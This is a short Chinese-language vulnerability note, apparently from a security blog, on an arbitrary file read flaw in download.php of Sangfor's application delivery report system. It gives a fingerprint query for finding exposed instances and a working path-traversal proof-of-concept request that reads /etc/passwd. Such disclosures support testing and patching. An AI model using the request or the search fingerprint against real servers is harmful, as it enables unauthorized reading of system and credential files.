深信服 应用交付报表系统 download.php 任意文件读取漏洞

漏洞描述

深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。

漏洞影响

深信服 应用交付报表系统

网络测绘

app=”SANGFOR-应用交付报表系统”

漏洞复现

登录页面

20240403115102279-1646063330818-50320d99-80e6-4f24-9ac7-1de5acf8d3d6.1d1f5554_2024-04-03_11-50-28 (1)

验证POC

/report/download.php?pdf=../../../../../etc/passwd

20240403115217894-1646063383225-b9436429-8a97-4675-9a24-29539b3e5be5.05d1338c_2024-04-03_11-51-37 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容